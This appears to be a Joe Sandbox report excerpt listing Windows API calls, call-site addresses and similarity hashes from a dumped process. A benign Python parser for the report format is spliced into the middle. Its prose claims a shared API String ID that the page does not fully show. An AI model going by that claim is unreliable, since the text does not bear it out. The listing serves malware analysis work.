                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
APIs
• CreateThread.KERNEL32(00000000,?,009BD369,00000000,00000004,00000000), ref: 009BD588
• GetLastError.KERNEL32 ref: 009BD594
• __dosmaperr.LIBCMT ref: 009BD59B
• ResumeThread.KERNEL32(00000000), ref: 009BD5B9
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009978B1
• GetStockObject.GDI32(00000011), ref: 009978C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 009978CF
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: CreateMessageObjectSendStockWindow
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,009C338D,00000364,00000000,00000000,00000000,?,009C35FE,00000006,FlsSetValue), ref: 009C3418
• GetLastError.KERNEL32(?,009C338D,00000364,00000000,00000000,00000000,?,009C35FE,00000006,FlsSetValue,00A33260,FlsSetValue,00000000,00000364,?,009C31B9), ref: 009C3424
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C338D,00000364,00000000,00000000,00000000,?,009C35FE,00000006,FlsSetValue,00A33260,FlsSetValue,00000000), ref: 009C3432
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: LibraryLoad$ErrorLast
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBA8B
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBAB0
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBABA
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009FB69A,?,00008000), ref: 009FBAED
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
APIs
• GetWindowRect.USER32(?,?), ref: 00A2888E
• ScreenToClient.USER32(?,?), ref: 00A288A6
• ScreenToClient.USER32(?,?), ref: 00A288CA
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A288E5
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                                                                                                  • Opcode ID: 7d83061a5955c7b9565a77c545bd3aefd510c6b870d596cfdecf51a6d72ac9a4
                                                                                                                                                                                                                                  • Instruction ID: 51304ddadb2abcf6639768ef7bf807091ce04fa9df067a0a4c9fbc9859ae68ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d83061a5955c7b9565a77c545bd3aefd510c6b870d596cfdecf51a6d72ac9a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 721142B9D01209EFDB51CFA8D884AEEBBF5FB08310F508166E915E3210D735AA55CF50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009F3712
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 009F3723
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009F372A
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009F3731
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                                                                                  • Opcode ID: bfebe302305044799f295dac0c924f0b535dddd3d0c04912cb2d8cebeaa56cd3
                                                                                                                                                                                                                                  • Instruction ID: 57a9558e0f56c5e3b7231603dd09a60e7c62980046bc4013eed42931cd45119d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfebe302305044799f295dac0c924f0b535dddd3d0c04912cb2d8cebeaa56cd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EE06DB11022287ADA30A7A69C4DEFB7F6CDB42BA1F100125F605D2081DAA8CA42C6B0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00991F87
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991F96
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: BeginPath.GDI32(?), ref: 00991FAD
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991FD6
                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A292E3
                                                                                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00A292F0
                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00A29300
                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00A2930E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                                                                                                  • Opcode ID: cd85291e95eaf777c2abe2f2026531894e57e301a154222d8baf3211b4d09605
                                                                                                                                                                                                                                  • Instruction ID: 25d1e890d2466c58545898d801807fc1fde50eba91fef045ad21364794b8378f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd85291e95eaf777c2abe2f2026531894e57e301a154222d8baf3211b4d09605
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F05432045659B6DB229F98AC0EFDE3F69AF09720F048110FA11250F2C7B555239BA5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 009921BC
                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 009921C6
                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 009921D9
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 009921E1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4037423528-0
                                                                                                                                                                                                                                  • Opcode ID: a3cf9a4863b2ec36f18f65f505d63e945807d56cccaa63601d022c5252752a13
                                                                                                                                                                                                                                  • Instruction ID: 5db23890c53667f50a4798d6237825f7ff6846f27d30e51458801f2e217a1617
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3cf9a4863b2ec36f18f65f505d63e945807d56cccaa63601d022c5252752a13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77E06531240240AADB319BB8BC0D7F83B15AB11336F14C32AF7BA541E1C77186529B11
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009EEC36
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 009EEC40
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009EEC60
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 009EEC81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                                                                                  • Opcode ID: c84144c858ff1282f304a12afc5fda89c131be1f2cb1eea1fa0e49a60e1a8944
                                                                                                                                                                                                                                  • Instruction ID: b696b0a2f4ea70e4b4a045202541aba610af8092064356e2401b4187431c8eb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84144c858ff1282f304a12afc5fda89c131be1f2cb1eea1fa0e49a60e1a8944
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98E01A74804204DFCF61DFA8C908A6DBBB5EB48310F208429E84AE3261C73C59039F40
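The function blocks above all follow one fixed layout: an APIs list with call-site addresses (callee calls marked "Part of subcall function"), then Memory Dump Source, Joe Sandbox IDA Plugin and Similarity key/value sections. The Python parser below is an added example, not Joe Security's code, that pulls those blocks into structures so a function can be located by the API set it calls and functions sharing an API String ID can be grouped (two of the blocks on this page carry 2889604237-0 at different addresses). The embedded SAMPLE is a constructed excerpt assembled from entries on this page, and the bullet character and section names are assumed to be exactly as rendered here.

```python
"""Parse the per-function blocks the Joe Sandbox IDA plugin renders in a report.
Added example, not Joe Security's code; assumes the layout exactly as rendered here."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# "• Name.DLL(a,b), ref: 0040ABCD" or "• Name.DLL ref: 0040ABCD", optionally
# prefixed with "Part of subcall function XXXXXXXX:" when a callee makes the call.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    dll: str
    args: list[str]
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when the call is one level down

@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    meta: dict[str, list[str]] = field(default_factory=dict)  # repeated keys keep order

    def direct_names(self) -> set[str]:
        return {a.name for a in self.apis if a.subcall_of is None}

    def entry_ref(self) -> int:
        # the plugin prints no function start, so the lowest direct call site is the handle
        return min(a.ref for a in self.apis if a.subcall_of is None)

def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # each block opens with its API list
            cur = FunctionBlock()
            blocks.append(cur)
        if line in SECTIONS:
            section = line
            continue
        if cur is None or not line:
            continue
        if section == "APIs":
            if m := API_RE.match(line):
                sub = m.group("sub")
                cur.apis.append(ApiCall(m.group("name"), m.group("dll"),
                                        [a for a in (m.group("args") or "").split(",") if a],
                                        int(m.group("ref"), 16), int(sub, 16) if sub else None))
        elif m := KV_RE.match(line):
            cur.meta.setdefault(m.group("key"), []).append(m.group("val"))
    return blocks

def functions_calling(blocks, *names):
    """Entry refs of functions whose direct API set contains every name given."""
    return [b.entry_ref() for b in blocks if set(names) <= b.direct_names()]

def group_by_api_string_id(blocks):
    """Same API String ID means the same API/string signature: code-reuse candidates."""
    groups = {}
    for b in blocks:
        for sid in b.meta.get("API String ID", []):
            groups.setdefault(sid, []).append(b.entry_ref())
    return groups

# Constructed excerpt assembled from entries on this page (hash lines omitted).
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009F3712
• GetWindowThreadProcessId.USER32(?,00000000), ref: 009F3723
• GetCurrentThreadId.KERNEL32 ref: 009F372A
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009F3731
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
  • Part of subcall function 00991F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00991F87
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A292E3
• LineTo.GDI32(?,?,?), ref: 00A292F0
Similarity
• API String ID: 1539411459-0
APIs
• GetDesktopWindow.USER32 ref: 009EEC36
• GetDC.USER32(00000000), ref: 009EEC40
Similarity
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 009EEC4A
• GetDC.USER32(00000000), ref: 009EEC54
Similarity
• API String ID: 2889604237-0
"""
```

Running `functions_calling(parse_blocks(report_text), "AttachThreadInput", "SendMessageTimeoutW")` on the full report text returns the call-site address of the thread-attach routine listed above, and `group_by_api_string_id` lists every function whose API String ID repeats, which is a quick way to find the near-duplicate routines before opening the dump in IDA.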
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009EEC4A
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 009EEC54
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009EEC60
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?), ref: 009EEC81
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
APIs
• Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A05919
Strings
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
APIs
• __startOneArgErrorHandling.LIBCMT ref: 009BE67D
Strings
Similarity
• API ID: ErrorHandling__start
• String ID: pow
Strings
Similarity
• API ID:
• String ID: #
APIs
• Sleep.KERNEL32(00000000), ref: 009AF6DB
• GlobalMemoryStatusEx.KERNEL32(?), ref: 009AF6F4
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
APIs
Strings
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00A240BD
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A240F8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00A250BD
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A250D2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A23D18
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A23D23
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00997873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009978B1
  • Part of subcall function 00997873: GetStockObject.GDI32(00000011), ref: 009978C5
  • Part of subcall function 00997873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009978CF
• GetWindowRect.USER32(00000000,?), ref: 00A24216
• GetSysColor.USER32(00000012), ref: 00A24230
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• CharUpperBuffW.USER32(?,?,?), ref: 009F761D
• _wcslen.LIBCMT ref: 009F7629
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009F2699
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: cbb64d1e85818c5ef5a18c4031ebde98cf764eb512facdf1cb8fc453af788af6
• Instruction ID: f06897b9ed3e87665dd1dceca4c94023365c3165cb450e97f77d756fbf893733
• Opcode Fuzzy Hash: cbb64d1e85818c5ef5a18c4031ebde98cf764eb512facdf1cb8fc453af788af6
• Instruction Fuzzy Hash: D801D475A41218ABCF04EBA8CC55EFE7768FF86360B400A1AB932972C1DA35590DCB50
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,00000180,00000000,?), ref: 009F2593
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 0e79e7a750c7bddd982c74b7bebb84b621051fb470617b81481c83ee6627ad74
• Instruction ID: 086ce287cc0d4b251be2e0a3fba73263d44b4201eeba03a8a266210e143e0951
• Opcode Fuzzy Hash: 0e79e7a750c7bddd982c74b7bebb84b621051fb470617b81481c83ee6627ad74
• Instruction Fuzzy Hash: 6C01A775A411087BCF04E794D966FFF77A8DF85351F5000297902A32C1DA249E0CC7B1
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,00000182,?,00000000), ref: 009F2615
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 3784ef4690ddb780aa398b6b91aec50f6c49cf01558674a35fcee24f6a2c178a
• Instruction ID: fc7c166fd9d018103bc5a779e150ec4847cb130c6f6720c41bd5017413689828
• Opcode Fuzzy Hash: 3784ef4690ddb780aa398b6b91aec50f6c49cf01558674a35fcee24f6a2c178a
• Instruction Fuzzy Hash: 8301A275A4110866CF15E7A4D902FFF77A89B45340F500026B902E32C1DA698E09D7B1
APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009F2720
Strings
